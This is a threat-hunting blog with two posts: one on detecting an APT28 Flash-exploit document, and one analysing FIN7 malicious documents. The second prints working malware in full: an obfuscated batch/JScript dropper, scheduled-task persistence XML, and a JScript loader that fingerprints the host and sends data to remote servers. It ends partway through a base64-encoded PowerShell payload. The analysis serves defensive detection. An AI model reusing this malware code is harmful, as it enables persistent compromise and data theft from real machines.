Saturday, October 21, 2017

Hunting APT28 CVE-2017-11292 Flash Vulnerability

Proofpoint made public a couple of days ago that APT28 is using the last flash 0-day CVE-2017-11292 via some malicious weaponized DOC files; APT28 racing to exploit CVE-2017-11292 Flash vulnerability before patches are deployed

So far I have not seen this vulnerability abused by common malware but I guess is a matter of time that cyber criminals starts using it. 

At the moment in VT there are only 2 files with the tag CVE-2017-11292 . 


The second one is basically the Flash embedded into the first one.




In order to create a Use Case to detect it, first of all I check which processes are
spawned by Microsoft Word, but unfortunately there is no single processes spawned.
Although, I see there is some communication performed to a domain blackpartshare.com




This means that Microsoft Word is doing the connection to Internet, and I can hunt for that:


Seeing the amount of malware abusing Microsoft Word documents, it is  a must to closely monitor any anormal activity coming from Microsoft Office as I have discussed in this blog, like for example, commands spawned, connections done, etc.

The domain accessed in this case is  the domain reported in proofpoint blog post which has been registered a couple of days ago.


Again, this might be a good indicator.

if you can get a whitelist of domains which are most frequently accessed in your environment and combined with top Alexa 500, you might create a Use Case to monitor the registration date of the domains which might be a good indicator. I wrote a Use Case to detect this kind of behaviour in Exploit Kits some time ago; Hunting Exploit Kits Abusing Domain Generator Algorithm. There might be other ways to do it, via for example Passive DNS or similar, but in the end the the target is the same.

Coming back to the behaviour of this malicious DOC file, one of the things I see is that it loads some Image in order to open the flash embedded via an ActiveX in the document. 



It is possible to spot this behaviour while monitoring what Image are loaded by Microsoft Word


Monitoring all the Image Loaded by a process like Microsoft Office can generated lot of noise, that is why it is important to narrow with appropriate filters. 
Things like Flash, with historically many vulnerabilities being exploited, is something you might consider to monitor closely.

Now it is possible to combined two use cases: the connections established by Microsoft word and the Flash image loaded in order to create a more advance Use Case. This is done with one sub-search using the process_id.

I search for any MS Office process which loads flash and then performs a connections to Internet.




There might be other approaches, like monitoring registry keys related to Flash and office, and connections, but I find this process quite simple and working.

Again, it is important to keep a close eye in any Microsoft Office process and the connections established, as this might be good indicators :)



Sunday, October 15, 2017

Hunting FIN7 malicious documents

A few days ago I read an interesting post about some new technique that FIN7 Threat Actors are using to deliver malicious payloads in RTF and DOC files. The ratio of detection was in the best case only 1/59



Although at the moment of writing this post the detection is much higher.


In any case, this is an interesting case to take a look.

Both files, the DOC and RTF, contains an OLE object which it is a CMD file. 



The CMD file is a batch file which contains a set of windows commands.


This means that a cmd.exe command will be spawned in order to executed the commands in the file.

A first use case to detect this malicious behaviour is to monitor all the child processes spawned by any Office program. This is the same approach explained in other posts in this blog.




The CMD (unlock.cmd) is the following 


@set w=wsc@ript /b /e:js@cript %HOMEPATH%\tt.txt
@echo try{var fs=new ActiveXObject('Scripting.FileSystemObject');sh=new ActiveXObject('Wscript.Shell');p=sh.ExpandEnvironmentStrings('%%HOM'+'EPATH%%')+'\\pp.txt';var f=fs.OpenTextFile(p,1,false);for(i=0;i^<4;i++)f.SkipLine();var com='';while(!f.AtEndOfStream)com+=f.ReadLine().substr(1);f.Close();try{fs.DeleteFile(p, true);}catch(e){}this[String.fromCharCode(101)+'v'+'al'](com);}catch(e){}; >%HOMEPATH%\tt.txt
@copy /y %TMP%\unlock.cmd %HOMEPATH%\pp.txt
@echo %w:@=%|cmd
#function b64dec(data){
# var cdo = new ActiveXObject("CDO.Message");
# var bp = cdo.BodyPart;
# bp.ContentTransferEncoding = "base64";
# bp.Charset = "windows-1251";
# var st = bp.GetEncodedContentStream();
# st.WriteText(data);
# st.Flush();
# st = bp.GetDecodedContentStream();
# st.Charset = "utf-8";
# return st.ReadText;
#}
#var fso = new ActiveXObject("Scripting.FileSystemObject");
#var sh = new ActiveXObject("Wscript.Shell");
#var fldr = sh.ExpandEnvironmentStrings("%HOMEPATH%");
#var p = "";
#p = fldr + "\\whatis.ini";
#if(!fso.FileExists(p)){
# var f = fso.OpenTextFile(p,2,1);
# f.Write( b64dec('ZnVu......
# f.Close();   
#}
#cmd = 'wscript.exe //b //e:jscript "' + p + '"';
#sh.Run(cmd, 0, false);
#fso.DeleteFile(WScript.ScriptFullName, true);
#function Abracadabra(){
# try{
#  var objWord=GetObject("","Word.Application");
#  objWord.Visible = true;
#  objWord.ScreenUpdating = false;
#  var objDoc = objWord.ActiveDocument;
#  objDoc.Content.Select();
#  objWord.Selection.Delete();
#  var objRange = objDoc.Range();
#  objRange.InsertAfter("ȪȪɃɅɄwɁȦɍɧɬɶɵɗɀȄ");
#  objRange.InsertParagraphAfter();  
#  objRange.InsertAfter("Ȫ ɃɅɄɁȦɍɧ ɬɶɵɗɀȄ ȪȧȀɥȦȿɃɚɚɏwɳɨɁǿȨ ȭȰșșɐɩɘɂɂȕȗȘȱəȓɏɾءاةیییڱڱۉ");
#  objRange.InsertParagraphAfter();  
#  objRange.InsertAfter("Ȗ ɤɤɢɩ ɕȧɵʋʒɛȚȃȃǾȺȻɄɜwɯȓ ɓɻɘȜȾɒȻɓə ɤɤʂɦɑɑɂȩɶ ʶʂɖɑɤɄɅɄǽȹɥɿɅȮȤɵʷȭɂʐʉʉ");
#  objRange.InsertParagraphAfter();  
#  objRange.InsertAfter("ȩɄɄɤȯȮǾɐʥ ʥʥɋɏɏȰȦɬɫwɒɯɚȩȩɈɓȨɃɃ Ȫɏɏɴɴɗȫȧȯ ȯȯȑȑȕȗțȝȝɦɤɍȹȦȫ Ȯɭʁʀɸɷ ɣȾɗə əəɒɐȸ ȺȚʥ");
#  objRange.InsertParagraphAfter();  
#  objRange.InsertAfter("ʣɸɗʄɻʎʡʠʠʐʐʔʖɫɓɑɣəȹɴwʏȽɞɞ ȻɄɜɯȓɓɻɘȜȾɒ ɑɂȩɶʶʂɖɑɤɄɅɄǽȹɥɿɅȮȤɵ ɃɅɄɁȦɍɧɬɶɵɗɀȄ");
#  objRange.InsertParagraphAfter();  
#  objRange.InsertAfter("ưnjƠƞưƤƊƌ ƛ ƳƴƤƊ ƥwƥƥţƠƠƵ");
#  objRange.InsertParagraphAfter();  
#  objRange.InsertAfter("ŸƌƌƉȮɐɐwɕɖɔɔȾȨʞʞɐʁ");
#  objRange.InsertParagraphAfter();  
#  objRange.InsertAfter("ɂȩɶʶʂɖwɑ Ʉǽȹ");
#  objRange.InsertParagraphAfter();  
#  objWord.ScreenUpdating = true; 
# } catch(e) { }  
#}
#Abracadabra();

Without going into the details of the execution flow, in essence the CMD, while executing the code, generates and executes an obfuscated file, which it is reality a JS file, and this same process is repeated several times in a loop. Several files with different extension are created (.INI, CHM and TXT,) however all of them are executed with the command "wscript" as showed below:







On important thing that happens is that there is a delay of 100s before to execute the second script in order to by-pass sanboxes and AV.

At some stage there is a schedule task created base on an XML.



<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
 <Triggers>
   <TimeTrigger>
     <Repetition>
       <Interval>PT47M</Interval>
       <StopAtDurationEnd>false</StopAtDurationEnd>
     </Repetition>
     <StartBoundary>2017-05-22T20:21:00</StartBoundary>
     <Enabled>true</Enabled>
   </TimeTrigger>
 </Triggers>
 <Settings>
   <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
   <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
   <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
   <AllowHardTerminate>true</AllowHardTerminate>
   <StartWhenAvailable>false</StartWhenAvailable>
   <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
   <IdleSettings>
     <Duration>PT10M</Duration>
     <WaitTimeout>PT1H</WaitTimeout>
     <StopOnIdleEnd>true</StopOnIdleEnd>
     <RestartOnIdle>false</RestartOnIdle>
   </IdleSettings>
   <AllowStartOnDemand>true</AllowStartOnDemand>
   <Enabled>true</Enabled>
   <Hidden>false</Hidden>
   <RunOnlyIfIdle>false</RunOnlyIfIdle>
   <WakeToRun>false</WakeToRun>
   <ExecutionTimeLimit>PT72H</ExecutionTimeLimit>
   <Priority>7</Priority>
 </Settings>
 <Actions Context="Author">
   <Exec>
     <Command>wscript.exe</Command>
     <Arguments>//b /e:jscript \Users\user1\{2DF6ACDA-8FF7-8208-77F5-8581F0D479E9}\59d76612d0ba68.06041356.txt</Arguments>
   </Exec>
 </Actions>
</Task>


So now we know how the persistence is achieve: via a schedule task which executes the command:

wscript.exe /b /e:jscript \Users\user1\{2DF6ACDA-8FF7-8208-77F5-8581F0D479E9}\59d76612d0ba68.06041356.txt

The directory "Users\user1\{2DF6ACDA-8FF7-8208-77F5-8581F0D479E9}" is used to store all the temporal files created and executed via the initial CMD command.

The schedule task can be seen via the windows GUI





At some point, there is some commands to map the system




The WScript runs every minute, so it is a good indicator also to check




There is a moment in which one of the scripts spawns a PowerShell command




The script basically acts as a dropper using powershell.

function readFile(p)
{
 try{ 
  var fs = new ActiveXObject("Scripting.FileSystemObject");
  var file = fs.GetFile(p);
  var stream = file.OpenAsTextStream(1, 0);
  var content = stream.ReadAll();
  stream.Close();
  return content;
 }catch(e){
  return "";
 } 
}
function pausecomp(millis)
{
    var date = new Date();
    var curDate = null;
    do{ 
  curDate = new Date();
  WScript.Sleep(100); 
 }while(curDate-date < millis);
}

function getProxy(){
 var WshShell = new ActiveXObject("WScript.Shell");
 
 try {
  var ProxyEnable = WshShell.RegRead("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyEnable");
  if(ProxyEnable == 1){
   var ProxyServer = WshShell.RegRead("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyServer");
   return ProxyServer;
  }else{
   return "";
  }
 } catch (e) {
  return "";
 }   
}

function downLoadUrl(metod,urlArr,url,val){
 for(var i=0; i<urlArr.length; i++) { 
  try {
   var xmlServerHttp = new ActiveXObject("Msxml2.ServerXMLHTTP.6.0");  
   xmlServerHttp.open(metod, urlArr[i] + url, false);
   var prox = getProxy();
   if( prox != ""){
    xmlServerHttp.setProxy(2, prox, "");
   }    
   xmlServerHttp.setOption(2, 13056);
   //xmlServerHttp.setTimeouts(0, 0, 0, 0);
   xmlServerHttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
   xmlServerHttp.setRequestHeader("Charset","utf-8");
   xmlServerHttp.setRequestHeader("Connection","Keep-Alive");
   xmlServerHttp.setRequestHeader("Keep-Alive","300");  
   xmlServerHttp.send(val);
   while (xmlServerHttp.readyState != 4) {
      xmlServerHttp.waitForResponse(1000);
   }
   if(xmlServerHttp.status == 200) {
    return xmlServerHttp.responseText;
   }  
  }catch(e){}
 }
 return ""; 
}

function b64enc(data){
 var cdo = new ActiveXObject("CDO.Message");
 var bp = cdo.BodyPart;
 bp.Charset = "utf-8";
 bp.ContentTransferEncoding = "base64";
 var st = bp.GetDecodedContentStream();
 st.WriteText(data);
 st.Flush();
 st = bp.GetEncodedContentStream();
 var result = st.ReadText(st.Size - 2);
 return result.replace(/\r\n/g, '');
}
function b64dec(data){
 var cdo = new ActiveXObject("CDO.Message");
 var bp = cdo.BodyPart;
 bp.ContentTransferEncoding = "base64";
 bp.Charset = "windows-1251";
 var st = bp.GetEncodedContentStream();
 st.WriteText(data);
 st.Flush();
 st = bp.GetDecodedContentStream();
 st.Charset = "utf-8";
 return st.ReadText;
}

function cuid(){
 var rmac = "1";
 try {
  var oWmiService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2");
  var cItems = oWmiService.ExecQuery("Select * from Win32_NetworkAdapter where physicaladapter=true");
  var oItem = new Enumerator(cItems);
  for (;!oItem.atEnd();oItem.moveNext()) {
   var mac = oItem.item().MACAddress;
   if(mac != null && typeof mac == "string"){
    rmac = mac;  
   }
  }
  rmac = rmac.replace(/[^A-Za-z0-9]/g, '');
 } catch (e) {} 
 var sn = "2";
 try {
  var FSO = new ActiveXObject("Scripting.FileSystemObject"); 
  var strDrive = FSO.GetDriveName(FSO.GetSpecialFolder(0));
  var D = FSO.GetDrive(strDrive);
  sn = D.SerialNumber;
 } catch (e) {}
 sn = b64enc(sn.toString());
 sn = sn.replace(/[^\w]+/g, "").slice(0, 20);
 rmac = rmac.slice(0, 20);
 return sn+rmac;
}

function getRandomInt(min, max) {
  return Math.floor(Math.random() * (max - min)) + min;
}
function randomString(length, chars) {
    var mask = '';
    if (chars.indexOf('a') > -1) mask += 'abcdefghijklmnopqrstuvwxyz';
    if (chars.indexOf('A') > -1) mask += 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';
    if (chars.indexOf('#') > -1) mask += '0123456789';
    if (chars.indexOf('!') > -1) mask += '~`!@#$%^&*()_+-={}[]:";\'<>?,./|\\';
    var result = '';
    for (var i = length; i > 0; --i) result += mask.charAt(Math.floor(Math.random() * mask.length));
    return result;
}
function randomParamName(){
    result = randomString(getRandomInt(1,3), 'aA') + randomString(getRandomInt(1,8), 'aA#');
    return result;
}
function randomParamData(){
    result = randomString(getRandomInt(1,12), 'aA#');
    return result;
}
function randomUrl(str){
 var result = "";
 var parArray = [];
 parArray.push({ name: randomParamName(), data: encodeURI(SimpleEncrypt(str)) });
 parArray.push({ name: randomParamName(), data: encodeURI(b64enc(kkid)) });
 for (var i = getRandomInt(0,5); i > 0; --i){
  parArray.push({ name: randomParamName(), data: randomParamData() });
 }
 parArray.sort(function(a, b){return 0.5 - Math.random()});
 
 for (var i = 0; i < parArray.length; i++) {
  result += parArray[i].name + "=" + parArray[i].data + "&";
 } 
 return "?" + result.replace(/&+$/,'');
}

function SimpleEncrypt(a){
 var str = b64enc(a);
 var chrArr = str.split('');
 var pos = -1;
 var resultArray = [];
 for (var i = 0; i < chrArr.length; i++) {
  pos = alfIn.indexOf(chrArr[i]);
  if( pos != -1 ){
   resultArray.push( alfOut.charAt(pos) );
  }else{
   resultArray.push( chrArr[i] );
  }
 }
 return resultArray.join("");
}
function SimpleDencrypt(a){
 var str = a;
 var chrArr = str.split('');
 var pos = -1;
 var resultArray = [];
 for (var i = 0; i < chrArr.length; i++) {
  pos = alfOut.indexOf(chrArr[i]);
  if( pos != -1 ){
   resultArray.push( alfIn.charAt(pos) );
  }else{
   resultArray.push( chrArr[i] );
  }
 }
 return b64dec(resultArray.join(""));
}


var evalString = (function () {/*
try{
 var fso = new ActiveXObject("Scripting.FileSystemObject");
 var sh = new ActiveXObject("Wscript.Shell");
 var jsLoaderDir = "{2DF6ACDA-8FF7-8208-77F5-8581F0D479E9}"; 
 var PS1Body = "JEVuY29kZWRDb21wcmVzc2VkRmlsZSA9IEAnCjdMMXJkK0pLc2liOHZYOEY3OTQxVTNablZRVzZvRXVmdGRkN3VOOUJCaGtFZTJyVlNFZ0pBaUZBU01tbHovN3ZFd0pqQThaVnh1WGUzV2VtYTlXeURVaVJrWEY5SWpKVEZDSi9FTG96UDJITWdzd21kTkpCOEplLy95V0IvelF6TUtlN3YyNTJQK04vdisvZWRFSW51TkZtUzNkMzQyK0o1S2RFM2ZSdE01d0ZHM3o1UVE4aTUvWnI0dmVZM3U5ZnZ5WStQQkQrOUFNNjNIZm9JQlhrc09wc2RqUnVkei9wTExqNTRQNlcvSS9FQnpmeDJRc2ZCL3BTYy94aE9FckVIeEN5di9qdmo0TWZydnI5Zy9zMUh1YjQ1V2RyUFF0T2h2cGo5ek53d2lqd0g2Lzl5eDkvS1J3RWx6R1hqaVRtbk1ITWRvNGxlQzYvbjVQZDBiUWZlUG05dlZtR3p2UkxkdVl6SndpLy91MXZoV0EyM1hPVEhaa0IzbVJ1Ymg1bEg0OTBKcDlibk1hdmEwbE1JQU9KdFNJbFhEOHg4NTBFUFV6dFpqQ2F1UU1uNFM0VFU5TjJFdEU4WVNGOUc2OUt6R2NySjFpT0hNOUx6SVBad0ZrdUU1WWIrdmo3OWtrMmVyREpldzRydDNMbFk2dDZrMFNXWWVENlE1U0k3WG4zZ2ZjTkdmNzBIVEl2R2RNek1wTDRQVEw4ajhqRXdtcmdmZDhqSXB3UktaamVjazlsRUxqejBQSm1nMG5Na1RPSUpmYzlTdUpMbE14WTIzc2F1eHVYUndiemE3YlphT3ZwaHQ3ZXZmeFFTcmRMMzZyNVhpd2xZZjlXcHRuVTIzb3JyWDJycDQxdnRYeWpxSmZpajNsbC83bGVhdVhUdVcvZGRGbi9wcGZyK1hoU3FjUmZFMXd5bWR4ZmtTMlZhN2x2V3F1Wi9hWTN2MVhMdFJwZTgzRVEwdW5NLzdpL0pKZlAzQmNmdWQ2ekZrOTR6K3VIcnVzTC9PNDFYdE53VnArYjF0Z1poSWtITzkrLzJ0KzErL2xvWlVVbi9MeTdXZC9NbmVXNXR6OTk4ajJ5VDlmblpsUFRqV1g5ZTNvKzM3OUEzOHBHUWVENDRmNzEwY1ViMzV5NmcvUnk2VXd0YjNOeGhKWkRQV2ZINlpmRGRiSEIzSHc4dS9uajdSUGR3M3VaeVBWc0o0aUZ0aC82Uzg2aHJ1K2MzWHB6enNpbngvQndOSHArNm9aZnppaW5CN0hyNGdSYmtYODBmbjFtUjU1ek5QclpiYWRzN0s5K25ORCs1VWVNTjNSbm5rOWtNVmFoNDBRRE5OK3lUMmV4a0E5c1JuN29UcDB2WlI4dGZqWnZPd0hEeUxQOFVqY3h5SmhlZXBrTzBlT3NDRFBCRjlUM0VhSGx6ZTN2eWE5UEN2ejE2Ri84T3QrNHI1Ky8vM1J4M28rbTZGSkRkeENieUJPbjhhdWo2Wi9JNDJIeThhMDNIeC92eGZsKzFDTExjd2Y0MSsvM09CRk8rbnA3a2VJRGdacUxjelc5bTQvbGVycVkvOWJRdnpVMXZkeHNwR3ZmU3JtV3dLTXZGc3ZaSTJxSjVKcExXcmVKLzBvMG8vQnpJL0s4dDVPWHhFdmsrWmZJUDA1ekZ3U1B4c29HamhrNjhUczN0eGVkN3I4U2FkditYRWZyUVZFKy9ONFJhc3hDUjBOZFkvTGFKRDdITHZHa2lNVG5qdWxGenRHNEZ4VWN2OFN3ZFovVnp6NTR1cmk5TTVQRVhnYTV0SjcrbGl1MzhsbTkyZW9kdWR2QnVPSVk4VEVkaGJPYXVabEY0YWRFMmwrNldjOWNMajhsSG43dGRmd3BrVi9QOGJjYkhxNXNPNmJuMko4U0dRZHhpVk53SGM4dSsyNzQ4U3FiMnNueDR5Vm1ZM2Q2WXZQSnYzZHlpbS83K2ltaFBHbmc1b0pCN0hpNitkaHhnekJDbDdMdEFGMy9vSCtCLy9wa3dMZTNYOXBPMktSMDZZUTN5WXNXOFowQjJ1N1crVEZaOGJLaFhacjdQOVRtTGc1NE1MK0xadk9DY1JYS3RmeTNFcWJKZk92bkxLdnRMQ0xNTmE3cC9jTnM2NGpYMXhnV24veHVJSHZRZTkwY2pQRFZVVVE1VXYwcmc5WURxVVlVcTZ4SjIvdlV0WHdQbWpybWx4emFUVHMwcC9QTDlua2RRVzNteHRsS243VTNVMnZtNmFibHZXRDNiNXo4anV3TEhub2R5ZGdsbTdRNWo0VnBlaVVIMFh6d0hqS05DdzF6Z0VKd2w2RTd1RVpOeit6d1QzRHk0OUZPUGZ6WWQxOXc3NmZrdWJ0TUV2L0YwOGN6ZmwvbDZHTHlWVGxrbDVaamdvLzUrYjJTUjkwY3o0S2E2MCtjb0lNRkp0cHJiRlM3RnNBTFEvQlhEK0g2Vnc0aHZDVUZObWwyWnI4NUVmNlFlR3dkbUNMd2J4dWptdm5qY1pTM2pYUHZ1OWVPeEYydGtnY3cwcVI1UHd3MnU4RDZpbUdrYTRlSnV5T3ZWUXQvdGVtV3ArYlFpWWM0RUpmRUY0bGZyL1I5Smt4Nzd0Q2ZPcThSajNDMUZncXU1MXd6d05YeTN6bDNFd096R2JyK2NCOS9qbHp3ZWVvNDhaUHJZMG5zNkc4ZTd2cTRFczl1WndTdkgrUnFPOWpONmNwQjNxYW5kbVF0cnhUWjFTRm1ONXZyQjBwZGJRbzczUEJBZjVmd2ZtemVxYXNONENFd3g4cDVCZm1ydGJJbnZ3ZHZyNmpicEt1RmxCMDVnMGs3bXI2QzlodVRGbUx2d2FUbExKMkF2U0pLeW0vVXdHNlU3R3c2ZGNNZkQ2SzhxYjdkNldIKzZwa29iMHkrOFNDdm5ZaDZ0VUhWWnJFcEZUeHorQXB6NHBKWDYveFF5TFNZbWZidGVFYXZHdWRxV1NHV25nWGhvZjY2V0xTL05OajFVS1U4ZmZOZzEwTUtOTEJaRkF5Y3R3MzNCa0VPbkYyTitLYnhyc2NEV1N6UlhPb080a0x2TFNOZW56NWplTlp5dkJrTytkWnBYcDhYY280VkRhOGQ1dnJ3blE0R0l6ZEVuQmdGVjA5S3V0cFdpdDdNTWowdERLNGRTcjdhVFBSYSswMmFVcTQyanpnaVptYytkWWR2R2xDOTJqUXlzOGkzOXlIbHlzSDQ1UFVGU2xxL2VwQ3I3U0xuZU9abVA2T2NzMS9nbkYxckkvejFwVjIyMW5wWVEzcnNibDAxNHZVVjJVUHl0NjhkNllXNjdNTUxiWnMvb1MvMmZNelQ3dGp6MXRmcmVtUUMvOStyUnlid3IrcVJvYW44dTBmMjd4N1p2M3RrYitpUjdhbS9Ua1RYaCtSbkhianZFTDllMWYvdXdQMjdBL2Z2RHR5L08zRC8xM1hnWGg3bEhUdHczeG5rN1hvNDc4QjlKN1AvUkp2dnRSTjVXNzM1Nmc3YzlVM0VOelhncmk5aTM5NS91NzVuK1JQdHQrc2JtRC9WZnJzZTRmMWMrKzE2TVBhejdiZnJNZFE3dE4rdXh6eHZhcjlkand0K3B2MTJmYVo3Yy92dCtxVDAxdmJiOVQzRm4yeS9YWjlJM3Q1K2UwTno4ZnIyMnhzYWl1L1NmcnUrdGZpejdiZnIrNHh2YmIrOVVCRmZiblVKL0ovZmZzTXh2OXQrRS9pWDJtOE4vZUdTOXMvdVR2c1R0cUFlTS91cXRwc2t2bVlUYWh1TFovTWhCUC8wdHNtNEhEKzM1Nk90Z20rbSsyd2o1a3VOMXRmdG9qd1c1WjlncnlmRG5acnFpUVgrMEVwL3RqLzhwMXJwSzV2RG92TC9tcFVLL0xWVytxZEUxWlBoWHJMU2wyTnBydG4rNzdLWi80blYxMWpvNjhLbzgyMzZzSHp4MDN2RW5XOER5NXUvRTZYM29oTjQ3elczdVJtTTdIZlpUSTh5ZDlIZHNEcDZKMnJtK2gycExkL2xFQWJTZVM4VkxwL2FaRDlIeVgwM2p0Nkhqa2ZOZHpQUEdmTm5QNmIwUk1yNUZqakwzZDNuSWZxTWNPQWN6ZmIzcjArVVB5Vks1cDdDdzluTmo1Y1BnTzRqOG85UGdONzdVOU0zaDQ2OWkxOS8rMXRtZzNmdURyYy9rZDBOdDNzUENmN256UnNQbFI3MS9YWjhZdUZ3SHZ1Zm92SjN6L251VHRwbW8yVTRtejRPOFhEcnpma2gyRS9QcGZMcGVFYWY0Z250RVVKQ1BPYm9TVlZ4ZVhNMjJzMHB3N2QvZVoyMU9GUFhmaWZEUTFJNHU2dHRqMytsOGZIL090YjNMMkVhWFBLWmJmRHZheHdZbG54bkZZdjlkWGoxSEp6OEdhYzRud1k3TzhINWhPWmV3SHZ0ZkRaR3RmOWRNTjhwdTYvQmZmSEpycWZoZkJUYWp6MHRGbTJzOFBpWTM3KzlETDFNT1hheVJ4bStrNHM5SE14KytmajBkVEg0TmVlODMzS0t0R1d1WHQ2LzhjWVR0UDhRbW8vckRPOHkrVWU2Tlh6UDN5MnN2UXZkeHpXNjUreSt4d25xQzl6K0F3Nzh2am9kbk1hdFB5RWxuQTE0bWhiT2d2NExxU0Z2YU0yVy9sN1BqZmdUa3NNNXc2OU5ELzlJOWIrOHV2VGV4L0ozVzJlK3U1SGxTbnJ4RHBsM3BIZElxajg3ejVmM3ViMHRVaHllcC9TdVVTMmU3THNRZk56OStLNXNQbEo5Zno1amlzM0FqanM2MTRmSmN3LytFd0xsc3lGUFErV3pJUGc0N09IWmVHZVA0UHBqZjhYenAzVHR3SmJwaDVlZjFQWDQ2ZXVlMW5WMnoxVVBHOHJYdjJXYjlYcFpQMHcxdVU3aXY4ZG5tcjNIQUsxOE85L3E1RTlINE45ckJHMnZtWHoyWHM5L2k1L1ExbTJWOWFQQnhQZWJTQzUvTGl2eHZXWnh0R0t4bjBzNmczL3UzajJSRy8vZW8rVnF0YWNCM2swcGU3WFg4dW4yRWZ2S2UxRi9mQVJmOC81SUYxeVNmOEVoVDczdDNDbkx5OWduSmZIbS9DR1poNGRNWXREU3dnQkxzaVZpLzhSblo1RlFYdlJ1NUhUd0VQN09xQjAvOVRIK2Q5MlRIOXVIWnkzdWNjK25INUI1NmNtUGoyUmlQaDA3Q3A0ZTkzWmNudTBqemRFVC9WNStEbURjTkh5NDBIV1dOeGpRSDhuRS83b2pKM0FPQWV6dmlRL2Z2dXczN1J4b1o4M0JDR1dhOXUzNHM5b0Qrdi9Tbm50dWVQUHhmLzJ2ajdlL2YrYStmc2t2c0lwYll2VzFENEcyaDlYMncyTkpkd3pmKzB1VE9nMjhtVGwxSnh6TjdEaDJuczBqWm5VUEVldnVJSmd0WnpUOHNyT1BMeGR1UDY3bThiNjkyRXNvVTIvMytMY0xkOFRrOTMvZWZEeTc0NHpZa1pHOGp0YlJEY2VrcWs2QTNEOHhkVGJxbDdMUFpoTXN3MzNNcm5FRi8yQTh4L1Y3T0oyamJaL21tYjI5UDEyenA5Wnk2T1dPd3d2OWpNZTdiaDRHK1hUSzhPMHpYejJkNkRQdWY5UkFlUnp3NnhQSG40NHMvV0hhbDd3MjUzak84QUZNL01odEVhN01vNzBkL2I2ckcyNi9YbkxHeExGVEgxOFMzL1A3MTZjM1BqemVFeHZEelpHQTkxZmVKRzl2TDdyNzhRaGM0bnlJb3dGYU8vbnVnaWw2Y21mbTJsOHZldjIxVC8xODJ4TS9IejV3N0lQUWYvYVpuLy9jNTMyV2ZjeFZHR1ZmZnVEbnF3dlgrdWJZRHBIVXgyZGw4NzVJUGlxczQzcDc5K2ZIcCtuWEl3OExVM01aSHNoOXZkeVpQR0xxT1pRL3VnNTFwcmZuemdETDlkMVRmaE1sTjM3TWM5c2RIbGo3ZUZIMldkUHpNTnZzSHM3czc4b1ZsRG1XdUppWEF2dlRzZUYvbDcrNHMxaWV6ajBuUGcrMFN3Kzd2ZUxJMVQ0UTdGSmQzRGc5TnFSOThQenVEQS94ZFI5blBoNDNkcC9taDRiZDltYmhwOFJESnpGVzhKTS92VFNKazlHdjRmK1JSRGR3UTh5YnUxanpnN0xuVWtCck9Ec2JONFBOMDhPRmo2cU1RMXMwWGhtUHd5MEs2QXk4SkNZWXFoMFBjeVBtMnNUeDlaZXBIRXp0Z2RLeElUKzBqbU1JdFY4M09mdDFtM2o4L1BZeThkYy9JeGNOREljL2pGNllCUWVwUEhRdWI1NU4vZFBsZVp4WGxQdG5NcCtBMUF2QTlJVHBRKzE0VVhpL0hsbjhYcUVqL0dXL1JobkgxMSttOGdabFBMMXg4YVBMT2pvZTh6MTFkQzZSVDVlbjl6WWRuVEI5ME5GRm1SN3BxR3U2SVhMYXhuRG1PZnRFOXhwVlhianR1elN2VXR5RFRvNFZjb0hrZStybEJTbDgrdTVjM3FhbFN6TTVLT3Q3VXYzMVdRUXBCSTV6Ull5TEw3OUk0OVc2dVhjZm1seUhkbGVzcU14czVsMEliekhoZjBCME84ejUwOFVaL0ZSczIzRjhGdHBPWkhha2diTjY1RFZhT0wvbFJXSS9VTWREb1hzNWJqMnY1OTVOQVJlbS9PbEYzdCttaUhQdUQ4bzRlLzhGaFJ4Si9wWDZPRzlwWEtEMGF0LzRrVnBPSytQMzFNclp2RCs5TklVMzYrU1k5U09WWEpMZWtVWjBKNGczUEY2VC84OXVlWkhXdFFIclVwZzZJL21lT3JrdzgwOHZ6dUZ0V2pubi9xQ1dTeEk4UjlIWjJYenpXWjg5N3NyQVVTNTFCaDVmdmJXeDk2Q0d1QXMwZlJqblFVUnY3ZkZkKzVWREwzMjlTNHd0SHRuQ3NpMEl5Nzc5STJMblgvTnlTaXplUEhIVWVqajhSV2RCNHVhREcwdnA2WHVNNG1zZnZyem9TT2k3a1Y5dGdyc3FLaGJEelFYeHhpT1I1eE04K1RLa0p4Ny9lTUZLZGw4ODlMblZTZk1QaDZzT0d2M1FZdVo1UjltbE9FOHRMNGtaTnp5ZjFZZUNHeXpEaHdkczdJOGI3RHR6QjRJM3NiSEhoeVljRzk5SkwrLzk1ZTdGUHBaSzR0Y1BqZkRoV0Q1ZUhudnpxK1cwMzlUeTBNODZXc1Q2OHZ4RXkrMVI5L0NQaE9NdG5mK084eEQ0azNsY2lzelBwM0ZWOUVQVzlkbCtDMFVVb1AxZGxNcW54RXVzbnU3S3VMM0E0TTZXME1hKzZMT2QyRzV1OTM3emZLQXY1MXVNemszdjBJQkZhdCtWU2Z4bFk0bHpQMzFVVnJ5UDdNdlRPWnd2NTk5ZmNObVpQL3lVcFZ5VTZ1MHVtUHoxQ21YOXdHN09sSEZrT2M5bjhGTkc4dlAyY2JDTVo2WXhkTTRZL1hLNk53NHZpYjhDN1pKSnZhaUc3eEk4Ly9SazR4eks4TXdPanV6d1JhMjNJK3N5SDhqemoyYjM0ZnN1Y2NMTEgwZGU4R3lWd2o5c1ZUalBCUyt3ZlFrMVhBc1d3bDBXZmJwcGIvMUgxV1NNYTdoUGYva0IyWFBFOENxeVR5dk9SKzNKQThoNEdEbCt0UVBzbU5jZVVxSVQ3Q0hnN3FPYmgrdHVYeURBdjVJQWY0RkFJZDVkOHNQN0Q4OE5QdDRBdkl1Z1J4UDRrcDJoeCs0V2VJL1oyci85TEc1bHpTRFlOTm5PNDVNbkgxMkVNOC9HT2Y1aXhzTy81eTd4SzFwVndvcnZldmJSWVJQV2gzWTBqYlY1Tk1MdWV4ekp5U3dPYnoyeS9aZG5CSTlFZWZoZXlKajBaeXNPRFBIdWcwTGgrVTM3WUhOOFhhRVFINTJQcFJpdnlTY3ZPZm96QVhMUExybUlMVjRoL04yOUwz